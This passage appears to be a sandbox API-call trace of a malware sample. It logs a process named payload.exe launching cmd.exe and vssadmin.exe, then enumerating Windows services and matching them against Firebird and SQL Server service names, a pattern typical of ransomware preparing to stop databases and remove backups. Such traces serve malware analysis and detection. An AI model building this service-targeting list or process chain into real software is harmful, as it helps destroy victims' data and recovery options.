pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0057.215] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0057.215] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0057.215] lstrlenW (lpString="attended.exe") returned 12 [0057.216] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0057.216] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0057.216] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0057.217] lstrlenW (lpString="pan physician.exe") returned 17 [0057.217] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0057.218] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0057.218] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0057.219] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0057.219] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0057.219] lstrlenW (lpString="over-celebrity.exe") returned 18 [0057.219] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0057.221] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0057.221] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0057.222] lstrlenW (lpString="payload.exe") returned 11 [0057.222] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0057.222] lstrlenW (lpString="cmd.exe") returned 7 [0057.222] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0057.223] lstrlenW (lpString="conhost.exe") returned 11 [0057.223] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0057.224] lstrlenW (lpString="vssadmin.exe") returned 12 [0057.224] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0057.225] lstrlenW (lpString="VSSVC.exe") returned 9 [0057.225] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0057.226] lstrlenW (lpString="svchost.exe") returned 11 [0057.226] Process32NextW (in: hSnapshot=0x1f8, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0057.226] CloseHandle (hObject=0x1f8) returned 1 [0057.226] Sleep (dwMilliseconds=0x1f4) [0058.102] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x625de8 [0058.103] EnumServicesStatusExW (in: hSCManager=0x625de8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0058.103] GetLastError () returned 0xea [0058.104] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x6c08c8 [0058.104] EnumServicesStatusExW (in: hSCManager=0x625de8, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c08c8, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c08c8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0058.105] CloseServiceHandle (hSCObject=0x625de8) returned 1 [0058.105] lstrlenW (lpString="Appinfo") returned 7 [0058.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0058.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0058.105] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0058.105] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0058.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0058.105] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0058.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0058.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0058.105] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0058.105] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0058.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0058.105] lstrlenW (lpString="AudioSrv") returned 8 [0058.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0058.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0058.105] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0058.105] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0058.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0058.105] lstrlenW (lpString="BFE") returned 3 [0058.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0058.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0058.106] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0058.106] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0058.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0058.106] lstrlenW (lpString="CryptSvc") returned 8 [0058.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0058.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0058.106] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0058.106] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0058.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0058.106] lstrlenW (lpString="CscService") returned 10 [0058.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0058.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0058.106] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0058.106] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0058.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0058.106] lstrlenW (lpString="DcomLaunch") returned 10 [0058.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0058.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0058.106] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0058.106] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0058.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0058.106] lstrlenW (lpString="Dhcp") returned 4 [0058.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0058.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0058.106] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0058.106] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0058.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0058.106] lstrlenW (lpString="Dnscache") returned 8 [0058.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0058.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0058.107] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0058.107] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0058.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0058.107] lstrlenW (lpString="DPS") returned 3 [0058.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0058.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0058.107] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0058.107] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0058.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0058.107] lstrlenW (lpString="eventlog") returned 8 [0058.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0058.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0058.107] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0058.107] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0058.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0058.107] lstrlenW (lpString="EventSystem") returned 11 [0058.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0058.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0058.107] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0058.107] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0058.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0058.107] lstrlenW (lpString="gpsvc") returned 5 [0058.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0058.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0058.107] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0058.107] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0058.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0058.107] lstrlenW (lpString="iphlpsvc") returned 8 [0058.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0058.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0058.107] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0058.108] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0058.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0058.108] lstrlenW (lpString="LanmanServer") returned 12 [0058.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0058.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0058.108] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0058.108] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0058.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0058.108] lstrlenW (lpString="LanmanWorkstation") returned 17 [0058.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0058.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0058.108] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0058.108] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0058.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0058.108] lstrlenW (lpString="lmhosts") returned 7 [0058.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0058.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0058.108] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0058.108] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0058.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0058.108] lstrlenW (lpString="MMCSS") returned 5 [0058.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0058.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0058.108] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0058.108] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0058.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0058.108] lstrlenW (lpString="MpsSvc") returned 6 [0058.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0058.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0058.108] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0058.108] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0058.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0058.109] lstrlenW (lpString="Netman") returned 6 [0058.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0058.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0058.109] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0058.109] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0058.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0058.109] lstrlenW (lpString="netprofm") returned 8 [0058.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0058.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0058.109] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0058.109] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0058.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0058.109] lstrlenW (lpString="NlaSvc") returned 6 [0058.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0058.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0058.109] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0058.109] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0058.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0058.109] lstrlenW (lpString="nsi") returned 3 [0058.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0058.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0058.109] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0058.109] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0058.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0058.109] lstrlenW (lpString="PcaSvc") returned 6 [0058.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0058.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0058.109] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0058.110] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0058.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0058.110] lstrlenW (lpString="PlugPlay") returned 8 [0058.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0058.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0058.110] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0058.110] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0058.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0058.110] lstrlenW (lpString="Power") returned 5 [0058.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0058.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0058.110] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0058.110] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0058.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0058.110] lstrlenW (lpString="ProfSvc") returned 7 [0058.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0058.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0058.110] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0058.110] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0058.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0058.110] lstrlenW (lpString="RpcEptMapper") returned 12 [0058.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0058.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0058.110] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0058.110] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0058.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0058.110] lstrlenW (lpString="RpcSs") returned 5 [0058.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0058.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0058.110] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0058.110] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0058.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0058.111] lstrlenW (lpString="SamSs") returned 5 [0058.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0058.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0058.111] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0058.111] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0058.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0058.111] lstrlenW (lpString="Schedule") returned 8 [0058.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0058.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0058.111] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0058.111] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0058.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0058.111] lstrlenW (lpString="SENS") returned 4 [0058.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0058.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0058.111] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0058.111] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0058.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0058.111] lstrlenW (lpString="ShellHWDetection") returned 16 [0058.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0058.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0058.111] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0058.111] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0058.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0058.111] lstrlenW (lpString="Spooler") returned 7 [0058.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0058.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0058.111] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0058.111] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0058.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0058.112] lstrlenW (lpString="swprv") returned 5 [0058.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0058.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0058.112] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0058.112] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0058.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0058.112] lstrlenW (lpString="SysMain") returned 7 [0058.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0058.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0058.112] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0058.112] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0058.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0058.112] lstrlenW (lpString="Themes") returned 6 [0058.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0058.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0058.112] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0058.112] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0058.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0058.112] lstrlenW (lpString="TrkWks") returned 6 [0058.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0058.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0058.112] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0058.112] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0058.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0058.112] lstrlenW (lpString="UxSms") returned 5 [0058.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0058.112] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0058.112] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0058.112] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0058.112] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0058.112] lstrlenW (lpString="VSS") returned 3 [0058.112] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0058.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0058.113] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0058.113] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0058.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0058.113] lstrlenW (lpString="WdiServiceHost") returned 14 [0058.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0058.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0058.113] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0058.113] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0058.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0058.113] lstrlenW (lpString="WdiSystemHost") returned 13 [0058.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0058.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0058.113] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0058.113] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0058.113] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0058.113] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0058.113] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0058.113] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0058.113] lstrcmpiW (lpString1="sqlwriter", 